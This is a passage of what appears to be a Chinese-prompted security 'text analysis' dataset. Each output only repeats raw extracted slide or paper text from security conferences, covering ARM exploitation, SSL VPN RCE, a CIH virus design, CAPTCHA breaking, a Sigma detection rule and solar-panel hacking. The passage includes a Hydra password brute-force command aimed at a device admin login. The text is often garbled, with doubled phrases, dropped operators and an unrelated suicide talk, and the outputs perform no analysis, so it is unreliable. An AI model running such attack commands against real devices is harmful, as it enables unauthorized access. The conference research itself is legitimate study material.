Ntdll.dll Calls CreateFile() Kernel ZwCreateFile() Procmon.sys System Call Performed 7 Kernel-Level Monitoring  Advantages  Captures every system call  Cant be avoided from userland  Disadvantages  Only captures functions implemented as system calls  Not every important function call in the Win32 API is implemented as a system call  Tools dont differentiate between process housekeeping and calls from usercode  Calls to internal DLLs cannot be observed 8 Process Monitor 9 Process Monitoring via Debugging  Advantages  Debugger can trap any function call, not just system calls  Trapped calls are more likely to be highly relevant to the programs operation  Disadvantages  Have to act as a debugger  Susceptible to countless anti-debugger techniques 10 Inline Hooks  Advantages  Can trap any function call, not just system calls  Trapped calls are more likely to be highly relevant to the programs operation  Not operating as a debugger  No device driver required  Disadvantages  More of a pain in the #@! to implement 11 Monitoring with Inline Ho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSuicide Risk Assessment and Intervention Tactics and Intervention Tactics Amber Baldet This won't be depressing. Trigger Warning: Discussion of mental health, self-harm, substance use/abuse, trauma, suicide depressing. amberella@attrition.org @amberbaldet The Numbers Leading Causes of Death in the United States, 2010: 1. Heart disease 2. Cancer 3. Chronic lower respiratory diseases 4. Stroke Cause of Death Count Suicide involving a firearm 38,364 19,392 Source: Number of deaths for leading causes of death (2010), CDC 4. Stroke 5. Accidents (unintentional injuries) 6. Alzheimer's disease 7. Diabetes 8. Nephritis (kidney failure) 9. Influenza & Pneumonia 10. Suicide (intentional self-harm) 11. Septicemia (infection) 12. Chronic liver disease (cirrhosis) 13. Hypertension 14. Parkinson's disease 15. Pneumonia involving a firearm by other means Homicide involving a firearm by other means 19,392 18,972 16,259 11,078 5,181 Suicide Rate for All Age Groups (US), 2010 Age Group / Rate per 100,000 20 The Numbers Total 85 + 75 - 84 65 - 74 55 - 64 45 - 54 35 - 44 25 - 34 15 - 24 5 - 14 5 10 15 Source: American Association of Suicidology, Suicide in the USA Based on 2010 Data Frequency of Suicide Completion  Tenth most common cause of death among the total US population  Third behind accidents and homicide for males age 15 - 24  The Numbers  Second only to accidental death among males age 25 - 34 Annual deaths in men age 18-34 (US) 20,000 15,000 10,000 5,000 Vietnam War HIV/AIDS 1955 1960 1965 1970 1975 1980 1985 1990 1995 Year / Total Deaths Chart: Jamison, Kay Redfield. Night Falls Fast: Understanding Suicide. Suicide How Did We Get Here? History of Stigma Clinical alternatives to \"Committed\"  Died by  Stop saying \"committed\" suicide.  Completed instead of successful  Was a victim of  Killed themselves How Did We Get Here? Evolution of Mental Health Treatment Selected Mathematician & Scientist Suicides Ludwig Boltzman Paul Drude Clara Immerwahr Aleksandr Lyapunov 1906, statist", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2013 tenacitysolutions.com 1835 Alexander Bell Drive, Suite 100, Reston, VA 20191 703-673-3100 Weaponizing your Pets! The War Kitteh and the Denial of Service Dog! DefCon! 10 August 2014! !  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Introductions!  Gene Bransfield @gbransfield!  Principle Security Engineer @ Tenacity!  I Love My Job!  They want my job!  They cant have it!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What is This About?!  Having a humorous idea!  Bringing Ideas to Fruition!  Stories of Triumph and Woe!  Valuable Lessons Learned! !  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Weaponize your PETS!?!?!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Background:!  15% of the worlds Internet traffic is dedicated to Cats!  I find most tech briefings boring, so I use pics of cats to help keep people awake! !  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 The pic that started it all:!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Just Finished a Presentation \"!  Someone told me they were going to give me this tracking collar that they won!  GPS!  Cellular!  Told you where the Kitteh was at all times!  add a little wifi sniffer and wed have a WAR KITTEH!!!!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What about the DoS Dog?!  AT Outerz0ne!  LadyMerlin walked in with a dog wearing a harness that said Denial of Service Dog!  I said Is there a Pineapple in there?!  No, the dog is a pain, but thats a geat idea!!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Working Animals!  2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Bad Ass Working Animals!  2013 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n============= Non-Executable Stack ARM Exploitation ================= 0.- Introduction 1.- ARM Assembly 1.0 - Exploitation of ARM vs. X86 when stack isn't executable 1.1 - ARM calling convention (APCS) 1.2 - Why simple ret2libc will not work? 1.3 - Understanding the vulnerable function 2.- ARM Exploitation 2.0 - Controlling the PC 2.1 - Ret2ZP (Return To Zero Protection) - For Local Attacker 2.2 - Ret2ZP (Return To Zero Protection) - Attack Explained in Depth (For Remote Attacker) 2.3 - Ret2ZP - R0..R3 Adjustments 2.4 - Ret2ZP - Using the attack to enable stack 2.5 - Ret2ZP - Hacking Android based phone 3.- Conclusion 4.- Acknowledgments 5.- Author 6.- References --[ 0.- Introduction This paper is describing techniques to exploit stack-based buffer overflows and to get more familiar with ARM exploitation in the modern age - where ARM stack isn't executable. This research was made to understand the risks on modern ARM devices in-order to prevent them by suggesting solutions. Disclaimer: When using parts from this paper, you should still credit the authors of this paper and point to an updating link of this paper as a reference. Ret2ZP Attack is described fully and can be preformed at your own ARM devices. I will claim no responsibility for doing yourself or other damage. It's on your own risk. This paper is assuming basic knowledge in X86 assembly or ARM assembly. Also, knowledge of exploitation techniques may assist understanding the paper (when stack is not executable, such as ret2libc attacks). Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than there was actually allocated for that buffer. How can a BO be used? (I) A user can locally run commands to elevate privileges and gain control over a mobile-device. (II) A user can remotely exploit a phone, to gain control over a remote phone to execute commands. This paper intends to show theres still a risk in current implied security mechanism for devices using ARM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVirus Impossible Virus Impossible CIH<Software Magician> CIH<Software Magician> ＥＭＡＩＬ ＥＭＡＩＬIamCIH IamCIHＡＴ ＡＴgmail gmailＤＯＴ ＤＯＴcom com GIGA GIGA--BYTE TECHNOLOGY CO., LTD. BYTE TECHNOLOGY CO., LTD. 2009/07/18 2009/07/18 PDF created with pdfFactory Pro trial version www.pdffactory.com 這一天 這一天  怎會這樣我的電腦被駭客入侵了什麼螢幕 怎會這樣我的電腦被駭客入侵了什麼螢幕 出現倒數 出現倒數10 10秒就要把我電腦整個資料破壞 秒就要把我電腦整個資料破壞  螢幕出現倒數 螢幕出現倒數10~9~...1~0 10~9~...1~0秒 秒 最後出現一串字 最後出現一串字Just Kidding Just Kidding  本台記者報導今天下午在同一瞬間全世 本台記者報導今天下午在同一瞬間全世 界電腦都出現這個訊息 界電腦都出現這個訊息\"\"You've been You've been hacked hacked\"\"幸好駭客最後沒有真正破壞電腦資 幸好駭客最後沒有真正破壞電腦資 料但是已經引起全世界極度惶恐從未有這樣 料但是已經引起全世界極度惶恐從未有這樣 事情發生過各國政府機關資安單位全面關切 事情發生過各國政府機關資安單位全面關切 中駭客的下一步是什麼 中駭客的下一步是什麼  PDF created with pdfFactory Pro trial version www.pdffactory.com 前言 前言 這篇文章的想法只是一個很初步的簡單雛 這篇文章的想法只是一個很初步的簡單雛 形並沒有實際驗證過也或許藏著一些 形並沒有實際驗證過也或許藏著一些 不可能實現的技術或是錯誤的想法就 不可能實現的技術或是錯誤的想法就 以技術討論的話一定會有更大的改善空 以技術討論的話一定會有更大的改善空 間裡面的論點都基於 間裡面的論點都基於理想 理想狀態沒有 狀態沒有 細節分析所有可能性若是要完整實現整 細節分析所有可能性若是要完整實現整 個系統將是非常複雜的事情因此此 個系統將是非常複雜的事情因此此 篇內容只是提供大家另一種病毒可能 篇內容只是提供大家另一種病毒可能 行為的思考 行為的思考 PDF created with pdfFactory Pro trial version www.pdffactory.com 行為模式 行為模式 u u 病毒 病毒 u u 蠕蟲 蠕蟲 u u 感染行為 感染行為  鑽網路漏洞 鑽網路漏洞  感染執行檔 感染執行檔 u u 殭屍網路 殭屍網路((BotNet BotNet) ) u u P2P P2P u u 動態執行 動態執行Function Function PDF created with pdfFactory Pro trial version www.pdffactory.com 基本背景 基本背景 u u Super Node Super Node中毒電腦具有 中毒電腦具有Public IP Public IP   建立 建立Node Node彼此間的連線 彼此間的連線((協助穿越 協助穿越NAT) NAT)   除此之外就跟一般 除此之外就跟一般Node Node完全相同 完全相同 u u Node Node所有全部的中毒電腦 所有全部的中毒電腦((包括 包括Super Super Node) Node)  u u 一般 一般Node Node不包括 不包括Super Node Super Node的 的Node Node  u u 這些 這些Node Node彼此會有 彼此會有2~5 2~5個連線交集成一個病 個連線交集成一個病 毒網路系統 毒網路系統 PDF created with pdfFactory Pro trial version www.pdffactory.com PDF created with pdfFactory Pro trial version www.pdffactory.com 病毒的架構 病毒的架構 u u Function Layer Function Layer  接收 接收Command Command若沒有這個 若沒有這個Command Command所需要的 所需要的 Function Function就會去病毒網路系統尋找 就會去病毒網路系統尋找 u u Network Packet Layer Network Packet Layer  接收來自 接收", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON 2013 : CYBERWAR, IN HACK WE TRUST JUL. 19-20, 2013 How can I have 100 0-day for just 1-day Version : Draft Speak by R3d4l3rt 1 HITCON 2013 Introduction I. How can I found bug easily? III. Project Overview II. How can I have about one hundred vulnerability for just 1 days IV. Outline  Introduction of speaker  I just want to find a lot of vulnerability  Think it easier and Change ones way of thinking  How can we found vulnerabilities  About ActiveX  APT Attacks via Active-X (Cases Study)  Introduction Automatic sample collections tool (Demo) Introduction Auto Install sample tool (Demo)  Introductions Fuzzer  Introductions Exploit  Result of Tested  Examples (Active X Vulnerability) 2 HITCON 2013 Introduction I. How can I found bug easily? III. Project Overview II. How can I have about one hundred vulnerability for just 1 days IV. Outline  Introduction of speaker  I just want to find a lot of vulnerability  Think it easier and Change ones way of thinking  How can we found vulnerabilities  About ActiveX  APT Attacks via Active-X (Cases Study)  Introduction Automatic sample collections tool (Demo) Introduction Auto Install sample tool (Demo)  Introductions Fuzzer  Introductions Exploit  Result of Tested  Examples (Active X Vulnerability) 3 HITCON 2013 Introduction Who Speaker Introduction Louis Hur is corporate president and Chief Executive Officer (CEO) of NSHC Corporation. He co- founded NSHC with four Hackers in 2003 while studying at the University, and was the first CEO until now Mr. Louis brings more than 15 years of field-proven experience security and bug hunting businesses that help clients reduce their enterprise-wide IT security risk. Prior to starting NSHC, He is a frequent speaker on Internet security issues and has appeared as an expert on various media outlets, including HK TV and MBC, KBS. Experience (2010 ~ 2013) - 2013 Vulnerability Analysis of NSHCs R3d4l3rt Teams. (Discovered 0-day many times. ) - 2011 Black-Hat Abu Dhabi Speaker - 2010 CSO Con", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCAPTCHAs: Are they really hopeless? ( Yes ) Completely Automated Public Test to tell Computers and Humans Apart Why? Protect from automated abuse. Examples The Problem  Really hard for a computer  Hard for a person  So they cant be too hard CAPTCHA Breaking  Is it worth it?  $$ value per CAPTCHA solved  Retooling Cost Automation?  Is automation worthwhile?  CAPTCHA Farms  How much do they really cost?  Accuracy requirement? Two Approaches  Attack the implementation  Attack the actual CAPTCHA (by solving it) Implementation Issues  Not enough server side state  Map request to token  Has token been used before?  Problem:  Try to break more than once  Reuse solutions Server State function ts_is_human($ts_random, $string) { global $ts_random, $site_key; $datekey = date(\"F j\"); $rcode = hexdec(md5($site_key . $ts_random . $datekey)); $code = substr($rcode, 2, 6); return $string==$code; } Source: http://coffelius.arabandalucia.com Lousy Encoding  CAPTCHA solution encoded in URL or form parameters captcha_image.php?x=8&y=20 <input type=\"hidden\" name=\"cap\" value=\"c4ca4238a0b923820dcc509a6f75849b\"> Multiple Requests  Different images for same CAPTCHA.  Easy way to pump up accuracy. Lousy RNG  Most generators not secure  Difficulty  Truncated output  Intermediate requests  Multiple servers  Sleep easy. md5(rand) Lousy RNG function generate_code($len) { $code = ''; for($i = 1; $i <= $len; $i++) { $code .= charset{rand(0, strlen(charset)  1)}; } return $code; } Source: http://www.phpcaptcha.org Just for kicks, lets take a closer look. PHP rand PHPAPI long php_rand(TSRMLS_D) { long ret; if (!BG(rand_is_seeded)) php_srand(GENERATE_SEED() TSRMLS_CC); #ifdef ZTS ret = php_rand_r(&BG(rand_seed)); #else # if defined(HAVE_RANDOM) ret = random(); # elif defined(HAVE_LRAND48) ret = lrand48(); # else ret = rand(); # endif #endif return ret; } random()? man random random.c The random() function uses a non-linear additive feedback random number generator employing a default table of size 31 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0-7803-8367-2/04/$20.00 2004 IEEE Abstract-- Techniques and methods currently exist to detect if a certain type of rootkit has exploited a computer systems. However, these current techniques and methods can only indicate that a system has been exploited by a rootkit. We are currently developing a methodology to indicate if a rootkit is previously known or if it is a modified or entirely new rootkit. We present in this paper an application of our methodology against a previously unseen rootkit that was collected from the Georgia Tech Honeynet. We conduct our analysis process against this rootkit and are able to identify specific characteristics for subsequent detections of this rootkit. This ability will provide system administrators, researchers, and security personnel with the information necessary in order to take the best possible recovery actions. This may also help to detect and fingerprint additional instances and prevent further security instances involving rootkits. Index Terms-- forensics, Honeynet, rootkits, signatures I. INTRODUCTION Rootkits are a phenomenon that has recently drawn attention. Prior to rootkits, system utilities could be trusted to provide a system administrator with accurate information. Modern crackers have developed methods to conceal their activities and programs to assist in this concealment [1]. Rootkits are a serious threat to the security of a networked computer system. Modern operating systems are subject to a variety of exploits that allow hackers to gain root access on networked computer systems. This in turn, provides hackers with the ability to install rootkits on these compromised systems. System administrators need to be aware of the threats that their computers face from rootkits as well as the ability to recognize if a particular rootkit has been installed on their computer system. Part of our efforts is the use of a Honeynet to collect new rootkit type exploits. Rootkits are also available from other sources including th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport struct import sys import base64 if len(sys.argv) != 2: print \"Usage: %s data\" % sys.argv[0] exit(0) data = sys.argv[1] padding = 4 - len(data) % 4 if padding != 0: data = data + \"\\x00\" * padding result = [] blocks = struct.unpack(\"I\" * (len(data) / 4), data) for block in blocks: result += [block  block >> 16] output = '' for block in result: output += struct.pack(\"I\", block) print base64.b64encode(output)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Bleeding Edge Web Standards for AppSec Glory Bryant Zadegan Ryan Lester Advisor/Mentor CEO, Co-Founder Mach37 Cyph keybase.io/bryant hacker@linux.com @eganist @TheRyanLester  Does AppSec stuff, usually.  Mentors security startups, sometimes.  Mentors others on AppSec, occasionally.  Paid a buck to make Steve Ballmer dance, but just once.  Runs an E 2EE communication startup  Codes for an E 2EE communication startup Ran QA automation at a  rocket factory Got sued by Napster (and  not for piracy) Bleeding Edge Web Standards For Your (Ab)use, we'll talk about these: But Why? Source: Harold & Kumar Go to White Castle  New standards are frequently drafted.  Many introduce unforeseen complications.  Novel uses encourage future tweaks. S R I  Validate resources beyond your trust (e.g. CDNs) <script src=\"https://code.jquery.com/jquery.min.js\" integrity=\"sha256-[hash] sha256-[hash2]\" crossorigin=\"anonymous\" fallback-src=\"jquery.min.js\"> </script>  caniuse.com/subresource-integrity S R I  Validate resources beyond your trust (e.g. CDNs) <script src=\"https://code.jquery.com/jquery.min.js\" integrity=\"sha256-[hash] sha256-[hash2]\" crossorigin=\"anonymous\" x-sri-fallback=\"jquery.min.js\"> </script>  caniuse.com/subresource-integrity BUILDER DEMO heisenberg.co/srifallbackdemo/ Kneel to the demo gods SOURCE (Simplified BSD) github.com/cyph/sri-fallback Do source gods even exist? CSP  Combines semi-strict header with strict <meta>.  Allows for pre-loading of trusted complex logic.  Does not work for the verbs frame- ancestors, report-uri, or sandbox. BUILDER DEMO heisenberg.co/metacspdemo/ Fall on thy sword for the demo gods. CSP Considerations  Static content only in initial response! CSP  Best for adapting a semi -recent application for use with CSP.  Application s trusted static logic is allowed to execute on initial load.  Meta -Hardening prevents dynamic content from potentially executing later on.  This can break sites. Use !  (Chrome 46+ only; no reporting in Firefox ) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1078-003-win-来自公网的登陆失败行为 ## 来自ATT&CK的描述 VPNCitrix等远程服务及其它访问机制允许用户从外部访问企业内部网络资源通常有远程服务网关来管理这些服务连接和凭据认证Windows远程管理等服务也可以在外部使用 攻击者可能会通过远程服务来访问网络或在网络中停留通常用户须使用有效账号才能访问服务攻击者可能会通过凭据欺骗或入侵企业网络从用户侧获取凭据来获得有效账号权限在操作期间对远程服务的访问可用作冗余访问的一部分 ## 测试案例 windows账户登录失败 ## 检测日志 windows 安全日志 ## 测试复现 场景较简单请自行测试 ## 测试留痕 windows安全事件IDwin7/win2008+ ## 检测规则/思路 ### Sigma规则 ```yml title: 来自公网的登陆失败行为 description: 从公共IP登录可能表明防火墙或网络边界配置错误 author: NVISO 12306Br0(翻译+测试) date: 2020/05/06 tags: - attack.initial_access - attack.persistence - attack.t1078 - attack.t1190 - attack.t1133 logsource: product: windows service: security detection: selection: EventID: 4625 #登陆失败 unknown: IpAddress|contains: '-' privatev4: IpAddress|startswith: - '10.' #10.0.0.0/8 - '192.168.' #192.168.0.0/16 - '172.16.' #172.16.0.0/12 - '172.17.' - '172.18.' - '172.19.' - '172.20.' - '172.21.' - '172.22.' - '172.23.' - '172.24.' - '172.25.' - '172.26.' - '172.27.' - '172.28.' - '172.29.' - '172.30.' - '172.31.' - '127.' #127.0.0.0/8 - '169.254.' #169.254.0.0/16 privatev6: - IpAddress: '::1' #loopback - IpAddress|startswith: - 'fe80::' #link-local - 'fc00::' #unique local condition: selection and not (unknown or privatev4 or privatev6) falsepositives: - 互联网上的合法登录尝试 - IPv4到IPv6映射的IP level: medium ``` ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1078-003 <https://attack.mitre.org/techniques/T1078/003/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInfiltrating Corporate Intranet Like NSA Pre-auth RCE on Leading SSL VPNs Orange Tsai (@orange_8361) Meh Chang (@mehqq_) USA 2019 Orange Tsai  Principal security researcher at DEVCORE  Captain of HITCON CTF team  0day researcher, focusing on Web/Application security orange_8361 Meh Chang mehqq_  Security researcher at DEVCORE  HITCON & 217 CTF team  Focus on binary exploitation Highlights today  PreAuth root RCE exploit chain on Fortinet SSL VPN  Hard-core binary exploitation  Magic backdoor  PreAuth root RCE exploit chain on Pulse Secure SSL VPN  Out-of-box web exploitation  Highest bug bounty from Twitter ever  New attack surface to compromise back all your VPN clients Agenda  Introduction  Jailbreak the SSL VPN  Attack vectors  Case studies & Demos  Weaponize the SSL VPN  Recommendations SSL VPN  Trusted by large corporations to protect their assets  Work with any network environments and firewalls  Clientless, a web browser can do everything! SSL VPN Browser SSL/TLS Intranet What if your trusted SSL VPN is insecure? Why focusing on SSL VPN 1. Important corporate assets but a blind-spot 2. Widely used by corporations of all sizes 3. Only few SSL VPN vendors dominate the market 4. Direct Intranet access and must be exposed to outside Even NSA is hunting bugs on SSL VPN Think about Equation Group leaks They are usually forgotten A silent-fix case  We accidentally found a preAuth RCE on Palo Alto SSL VPN during our Red Team assessment  A silent fixed 1-day:  No CVE  No advisory  No official announcement Hacking Uber as showcase Response from Palo Alto PSIRT Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know. Number of high severity CVEs 159 50 26 17 13 6 Cisco F5 Palo Alto Citrix Fortinet Pulse Secure https://nvd.nist.gov We fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNim https://nim-lang.org/ Nim,,js WebAssembly brew install nim brew install mingw nimble install winim gcl https://github.com/byt3bl33d3r/OffensiveNim demo Offensive Nim Nim Offensive Nim Test minidump_bin dump  shellcode shellcode_bin demo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 3-异或 --- 目标 T3.exe 使用 IDA 打开,找 main 函数,并做基本的分析重命名函数 可以看到对比 T2.exe ,循环这里的每个字符+1变成了字符与i异或 转换的代码是 ```c for ( i = 0; i < strlen(v4); ++i ) v4[i] = i; ``` 编写相应 python 脚本 ```py data=[0x66,0x6D,0x63,0x64,0x7F,0x5C,0x49,0x52,0x57,0x4F,0x43,0x45,0x48,0x52,0x47,0x5B,0x4F,0x59,0x53,0x5B,0x55,0x68] for i in range(len(data)): data[i]=i print(bytearray(data)) ``` C语言版本 ```c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) { char aaa[]={0x66,0x6D,0x63,0x64,0x7F,0x5C,0x49,0x52,0x57,0x4F,0x43,0x45,0x48,0x52,0x47,0x5B,0x4F,0x59,0x53,0x5B,0x55,0x68,0x00}; for(unsigned int i=0;i < strlen(aaa);i++) aaa[i]=i; printf(\"%s\",aaa); return 0; } ``` --- **Source & Reference** - [萌新学逆向T3 有趣的异或运算](https://mp.weixin.qq.com/s/zxkId2CYi5-inUnG0JTsCg)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAug 2017 Senior Malware Scientist ,Trend Micro spark@trendmicro.com HITCON Source: https://ransomwaretracker.abuse.ch/tracker/cerber/ booster[0]: 0:[f1<127.5] yes=1,no=2,missing=1 1:[f7<28.5] yes=3,no=4,missing=3 3:[f5<30.95] yes=7,no=8,missing=7 7:[f0<5.5] yes=15,no=16,missing=15 15:leaf=-1.89091 16:leaf=-0.5 8:[f6<0.9045] yes=17,no=18,missing=17  Pros  Easy to program  Very fast training  Perform well against tabular input data  Use human intelligence and heuristics  Cons  Hard to debug when it mis-predicts  Development cost is high  Feature engineering is required Cell x Cell Xt Yt Cell y Cell z Cell . Cell t Cell w Answer h t t t W Cell i Cell k Cell 3 Cell . Cell h Cell k Answer Softmax 0.6 0.2 0.1 Cryptolocker Clean Locky Cerber-RIGEK 0.1 Fully Connected Source: https://stats.stackexchange.com/questions/273465/neural-network-softmax-activation Source: http://colah.github.io/posts/2015-08-Understanding-LSTMs/ Source: http://colah.github.io/posts/2015-08-Understanding-LSTMs/ Source: https://arxiv.org/pdf/1409.0473.pdf  Symbols do not carry their natural semantics within them whereas continuous signals such as audios and videos do. www.facebook.com/n/?kjoha GRU GRU GRU GRU Emb Emb Emb Emb Emb Emb GRU GRU GRU GRU GRU Shortest URLs Longest URLs  Cryptolocker Clean Locky Cerber-RIGEK  Feature  Dataset  Sourcing  Legitimate URLs: Akamai log  Cryptolocker: Malware operations team  Locky v2/ Cerber-RIGEK : Ransomware tracker  Splits  train : validation : test = 0.1 : 0.1 : 0.8 Before Training After Training  Undetected URL from test-cryptolocker.txt www.leriov.com:80/leriov3/player1.php?id=aH!BeF0cHM6 Ly9waG90b3MuZ29vZ2xlLmNvbS9zaGFyZS9B!BeFjF!BeFaXBNOH B!BeFcmplbEEydU!BeFPX3ZZQTBLel!BeFKdjNmWVItMUFaM1UxQ 1UtX25oWDho!BeFjNTaDh!BeFaEs0bF85WXNlYVVySUNBP2tleT1 NMDV3YjB!BeFelNtVXpj@bfgo2TFdKVk1YQX!BeFjWHBOY0VKdGF FdElhMHBS&id2=  Analysis This URL was misplaced in the test cryptolocker sample list. So this missed detection is a correct behaviour.  Training and Testing by th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBetrayal of Reputation Trusting the Untrustable Hardware and Software with Reputation Seunghun Han Senior Security Researcher at National Security Research Institute 29 May 2019 - Senior security researcher at NSR (National Security Research Institute of South Korea) - Influencer Member of Black Hat Asia 2019 - Review Board Member of KIMCHICON - Speaker at - USENIX Security 2018 - Black Hat Asia 2017 - 2019 - HITBSecConf 2016 - 2017 - BeVX and KIMCHICON 2018 - Author of 64-bit multi-core OS principles and structure, Vol. 1 and Vol. 2) - a.k.a kkamagui @kkamagui1 Who Am I? - Introduce a stereotype about reputation - REPUTATION does not mean TRUSTWORTHINESS! - Unfortunately, we easily trust something because of REPUTATION! - Present the case that the reputation betrays you - BIOS/UEFI firmware and Trusted Platform Module (TPM) were made by REPUTABLE companies! - However, I found two vulnerabilities, CVE-2017-16837 and CVE-2018- 6622, that can subvert the TPM - Present countermeasures and what we should do - Trust nothing with REPUTATION and check everything for yourself! Goal of This Talk Previous Works Reputation is based on trust! We just believe products of reputable companies trustable Reputable Companies (High Price) Other Companies (Low Price) for you! for presents! Reputable Companies (High Price) Other Companies (Low Price) for you! for presents! I KNOW WHAT YOU DID FOR THE PRESENTS! Trusted Building Block Root of Trust for Measurement Core RTM Reputable products are really trustable? Reputable Trustable! Everyone has a plan, until they get punched in the mouth. - Mike Tyson Everyone has a plan, until they get punched in the mouth. - Mike Tyson Every researcher has a plan, until they encounter their manager. - Unknown You Every researcher has a plan, until they encounter their manager. - Unknown Manager CEO Timeline ~~ Happiness 0 5 10 - 10 - 5 - 1000 - 100 2017 2018 2019 Time (year) First Encounter Second Encounter CVE-2017- 16837 CVE-2018- 6622 USENIX Securi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n01 02 03 MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) 2 IBM Security Who is this Drew Carey Look Alike On Stage?  Red Team Ops Lead at IBM X-Force Red  I conduct red teaming operations against defense contractors and some of North Americas largest banks  On the board for CREST USA (crest-approved.org)  I teach network and mobile pentesting  I like mountain biking, drones, and beer  Its my first time, be gentle  Canadian, sorry not sorry 3 IBM Security Lab Background  3 domains within 2012R2 Forest & 2016 Forest, connected via 2-way Forest Trust  3000~ users  ATP RS2 running on 10x Windows 10 1703 boxes with all ATP default and preview features enabled  10x 2012R2/2016 member servers running SQL 2012, etc.  Both forests have an ATA 1.8 Lightweight Gateway running 1.7 since March, upgraded to 1.8 early July 4 IBM Security Tactical nukes? wut? Red Team Blue Team 5 IBM Security Were Talking Post Breach Source: https://blogs.microsoft.com/microsoftsecure/2016/11/28/disrupting-the-kill-chain/ 6 IBM Security ATPs Cloud-Based Management Dashboard Intro 7 IBM Security Alert Process Tree 8 IBM Security Incident Graphs 9 IBM Security Host Management 10 IBM Security Upcoming Windows 10 Fall Creators Update w/ ATP Release 3 Defender brand expanded to include:  Windows Defender AV  Windows Defender Advanced Threat Protection  Windows Defender Exploit Guard (EMET)  Windows Defender Application Guard  Windows Defender Device Guard  Credential Guard  Extended to cover the Windows Server platform, starting with Windows Server 2012 R2 and 2016, Linux Source: https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/ 11 IBM Security 12 IBM Security Gaining a Foothold w/ Out Of The Box Payloads 13 IBM Security Obfuscated Payloads 14 IBM Security Oh right, they talked about PSv5 security last year...  Suspicious Strings are already flagged in PSv5 by default  PowerShell v5 has Script Block Logging on by default.  AMSI is ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll Your Solar Panels are belong to Me FRED BRET-MOUNET Who am I?  Disclaimer:  This presentation is based on information I gathered through my research. It is full of omissions and inaccuracies due to my own lack of knowlege and incompetency.  This research has performed on my (extensive) spare time. My employer has nothing to do with this content.  WarGames (1983)  the first movie about a hacker? A hacker is one who enjoys the intellectual challenge of creatively overcoming limitations of software systems to achieve novel and clever outcomes. Gehring, Verna (2004). The Internet In Public Life. This is the topic of today! Tigo Energy  Maximizer Management Unit  (Remotely) Manages individual Solar Panels through Bluetooth.  In emergency conditions, can (remotely) disable the array by shutting down individual solar panels.  Reports performance back to the Cloud. Tigo Energy  Maximizer Management Unit  (Remotely) Manages individual Solar Panels through Bluetooth.  In emergency conditions, can (remotely) disable the array by shutting down individual solar panels.  Reports performance back to the Cloud.  Can be used for performance SLAs Tigo Energy  Maximizer Management Unit  (Remotely) Manages individual Solar Panels through Bluetooth.  In emergency conditions, can (remotely) disable the array by shutting down individual solar panels.  Reports performance back to the Cloud.  Can be used for performance SLAs Where it started Attack Surfaces - Logical  Open Access Point  httpd  Dns  Ssh  Serial to tcp  Dhcp  Unknown UDP 5002 Attack Surfaces - Physical  uBoot  Console  Rs-489  USB host  Emergency Button Open Access Point  Thanks https://wigle.net/ !  Located 160+ out of ~1000 with 24/7 open AP.  10000+ with limited window of opportunity for open AP. Open Access Point httpd Alls lost! httpd Not really! Hydra to the rescue: hydra -l admin P rockyou.txt -v http://192.168.1.10:80/ httpd Not really! 36 hours later: Admin/Support httpd  One page caught my attention!  And anothe", "category": "text_analysis", "source": "security_papers"}
